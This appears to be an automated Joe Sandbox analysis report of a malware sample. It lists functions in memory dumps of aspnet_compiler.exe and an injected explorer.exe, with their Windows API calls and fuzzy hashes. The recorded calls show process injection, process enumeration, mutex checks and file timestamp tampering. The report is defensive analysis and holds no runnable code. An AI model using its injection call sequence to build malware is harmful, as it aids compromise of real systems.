Function 004030BF Relevance: 3.1, APIs: 2, Instructions: 82
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Strings

zOji, xrefs: 004018C5

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID: zOji
API String ID: 4152845823-4118548424
Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

Non-executed Functions

Function 004022D9 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB

Function 004022D8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB

Function 004022E5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97

Function 004022F7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B

Function 00402321 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7

Function 004025D3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91

Function 00402920 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704

Function 00402686 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

Analysis Process: explorer.exePID: 2580, Parent PID: 3636COMMON

Execution Graph

Execution Coverage:	59.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.6%
Total number of Nodes:	142
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03442FAC Relevance: 7.9, APIs: 5, Instructions: 360
nativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03444760: NtCreateSection.NTDLL ref: 034447D2

NtQueryInformationProcess.NTDLL ref: 034431A2
NtQueryInformationProcess.NTDLL ref: 034431CA
ReadProcessMemory.KERNEL32 ref: 034431FD
ReadProcessMemory.KERNEL32 ref: 0344322B
WriteProcessMemory.KERNEL32 ref: 034432A8

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
String ID:
API String ID: 1349948393-0
Opcode ID: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
Instruction ID: 912b7869c5d189c7244e469b1a5e3a5510faf7476253ab905fe5c4bce281acbe
Opcode Fuzzy Hash: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
Instruction Fuzzy Hash: A4B18035A18A0C8FDB58EF68D4456ADB3E1FB98710F14427ED84AE7245EF30E9068BC5

Function 03443BF4 Relevance: 7.6, APIs: 5, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 03443C16
Process32First.KERNEL32 ref: 03443C35
Process32Next.KERNEL32 ref: 03443C80
CloseHandle.KERNEL32 ref: 03443C8D
SleepEx.KERNEL32 ref: 03443C98

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction ID: 29b17538a18bef6b1e5262a08cb6eac57ab175baf84a1f898513ebd73896a4ee
Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction Fuzzy Hash: 62212434218A088FFB18EF64C0887AAB3E2FB88305F084A7FD40FDE284DB3485568715

Function 03444760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 034447D2

Strings

@, xrefs: 034447CA
@, xrefs: 034447EA

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID: @$@
API String ID: 2449625523-149943524
Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction ID: 73d603421511e92682f2345bc063f488473e3fbf33649423008b84d777576d60
Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction Fuzzy Hash: D4318AB4908B498FDB94EF59888466ABBE4FB58305F10067FE85AE7350DB30D840CB85

Function 034435E8 Relevance: 1.9, APIs: 1, Instructions: 412
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE ref: 03443635

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
Instruction ID: 9f061de1d210f4a400a2d32dd115765f872ca70c77a20f8c03b394387b0e7083
Opcode Fuzzy Hash: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
Instruction Fuzzy Hash: 35E1FC34608A4C8FDF94EF28C895E9AB7F1FFA9305F114699E44ACB265DB30E944CB41

Function 03443490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 034434E4

Part of subcall function 034435E8: CoCreateInstance.COMBASE ref: 03443635

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstanceNameUser
String ID:
API String ID: 3213660374-0
Opcode ID: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
Instruction ID: 190d4ac172e9b5995e58a2a779de72d56e9b4391d963f806ad7758d4bc28f9a6
Opcode Fuzzy Hash: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
Instruction Fuzzy Hash: E0114834718B4C4FDBD0EF6D901876EB6E2FBDC200F400A7EA84ECB255DA7889458B85

Function 034419D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 299
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 03441AE7
CreateThread.KERNEL32 ref: 03441CA2
CloseHandle.KERNEL32 ref: 03441CAB
CreateThread.KERNEL32 ref: 03441CC9

Strings

iP+, xrefs: 03441C32
%g?, xrefs: 03441A37

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$CloseHandleHeap
String ID: %g?$iP+
API String ID: 371905858-765743493
Opcode ID: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
Instruction ID: f9993c0a013a155e7304275817b0aa28680cf6b9a657587bfb3bf6939bc197cf
Opcode Fuzzy Hash: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
Instruction Fuzzy Hash: 7A91C830618A088FDF14EF19DC826A573D6FB98301B48417E9C4ECF256DA34E982DB96

Function 03441F04 Relevance: 7.7, APIs: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 03441F8E
CopyFileW.KERNEL32 ref: 03441F9D
DeleteFileW.KERNEL32 ref: 03441FAE
DeleteFileW.KERNEL32 ref: 03441FF9

Part of subcall function 03444920: SetFileAttributesW.KERNEL32 ref: 0344496F
Part of subcall function 03444920: CreateFileW.KERNEL32 ref: 03444999
Part of subcall function 03444920: SetFileTime.KERNEL32 ref: 034449C4

CreateFileW.KERNEL32 ref: 03442085

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
Instruction ID: 74ab40000fd9de54ee6bde68ea299fea1bdf80e84e1e1d756b1db66c1052c39a
Opcode Fuzzy Hash: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
Instruction Fuzzy Hash: 56418D24718B4C4FEBA8EFAD941836E71D2EB8C211F10457FA90ECB385DE748D068789

Function 0344230C Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 034424E9
CreateFileW.KERNEL32 ref: 03442512
WriteFile.KERNEL32 ref: 03442572

Strings

|:|, xrefs: 0344242C

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteWrite
String ID: |:|
API String ID: 2199199414-3736120136
Opcode ID: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
Instruction ID: 88589cdca582af04a1fad3e29c4951b420c2542b0865dd2c86297385d7d3c4f0
Opcode Fuzzy Hash: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
Instruction Fuzzy Hash: 37E1B730718F484FE759EB6894592AAB6D1FB98311F140A3FE49FC7280DF74E902874A

Function 03441D8C Relevance: 4.6, APIs: 3, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03444C90: GetVolumeInformationA.KERNEL32 ref: 03444CFD

CreateMutexExA.KERNEL32 ref: 03441DFF
CreateFileMappingA.KERNEL32 ref: 03441EB1
SleepEx.KERNEL32 ref: 03441EEE

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexSleepVolume
String ID:
API String ID: 3744091137-0
Opcode ID: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
Instruction ID: a1c1cce70364ebf8b55d98427e81acd6ace2b35ad96eb2daeaa978d3bd99f80c
Opcode Fuzzy Hash: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
Instruction Fuzzy Hash: 93416F34714F088FFB64EB7980587ABB6D2EB98306F144A3F905EDA241CF7496429789

Function 03444920 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 0344496F
CreateFileW.KERNEL32 ref: 03444999
SetFileTime.KERNEL32 ref: 034449C4

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
Instruction ID: ed6ac36031dd3f4661806f2763383fcdeb2f6ef9f18365125fb26ca2ae3d5d73
Opcode Fuzzy Hash: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
Instruction Fuzzy Hash: 8421003071CB488FDF64EF68988879EB6E2FBDC701F10456EA85ED7245DA34DA058782

Function 03442CD0 Relevance: 3.3, APIs: 2, Instructions: 254
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 034432EC: CreateFileW.KERNEL32 ref: 03443332
Part of subcall function 034432EC: ReadFile.KERNEL32 ref: 03443379

ResumeThread.KERNEL32 ref: 03442EFE
SleepEx.KERNEL32 ref: 03442F43

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateReadResumeSleepThread
String ID:
API String ID: 3143597149-0
Opcode ID: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
Instruction ID: 3f3f2ad367d684c2546de454aaf7dbeb565e1fa67215880915d3d3eaaf2a0e1a
Opcode Fuzzy Hash: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
Instruction Fuzzy Hash: FF71A830708F499FE769EB28C4587AAB3E1FB98311F54453EE49EC7241DF74A8428785

Function 034432EC Relevance: 3.2, APIs: 2, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 03443332
ReadFile.KERNEL32 ref: 03443379

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
Instruction ID: b430f4b18dd3ebfaaf63b5e6800fb7e0af9bd63f524a049362754fec1b4a86ff
Opcode Fuzzy Hash: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
Instruction Fuzzy Hash: 9A41C23471CF0D4FE758EA6CA8593BAB2D2FB89611F14027FA49BC7341EE24981247C6

Function 03444E00 Relevance: 3.1, APIs: 2, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32 ref: 03444E85
ObtainUserAgentString.URLMON ref: 03444EEE

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainQueryStringUserValue
String ID:
API String ID: 4107646653-0
Opcode ID: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
Instruction ID: ad30cf3265cc3e2bf3982c31c803f821f28c9a1cca725dfce4ead410328750ef
Opcode Fuzzy Hash: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
Instruction Fuzzy Hash: 8631A635608B4C8FEF18EF69D8496EA77E5FB98310B10027FD85ACB245EE7098064795

Function 03444A40 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 03444A94
GetTokenInformation.KERNELBASE ref: 03444ACB

Memory Dump Source

Source File: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, Offset: 03441000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3441000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
